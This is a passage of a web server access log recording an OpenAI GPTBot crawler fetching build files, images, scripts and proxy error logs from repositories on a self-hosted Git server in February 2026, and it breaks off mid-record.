"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11902] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:15:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17965] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17967] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:15:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70934] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:15:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:15:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10960] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:15:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:15:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 10889] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:15:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:15:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 10896] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:15:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10874] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" -[17/Feb/2026:15:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 14903] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" -[17/Feb/2026:15:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11327] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11394] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18405] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 8206055] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:15:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:15:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 4568382] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:15:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146781] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:15:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:15:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:15:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10324] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:15:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 14988] [Gzip 7.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" -[17/Feb/2026:15:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fhoneywell-logo.svg" [Client 74.7.227.38] [Length 23341] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fbearing.png" [Client 74.7.227.38] [Length 19836] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14372] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 69273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2ffavicon.ico" [Client 74.7.227.38] [Length 19807] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:15:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2f.NETCoreApp%2cVersion%3dv8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 21414] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:15:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2freactor.png" [Client 74.7.227.38] [Length 19819] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:15:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12819] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 26614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 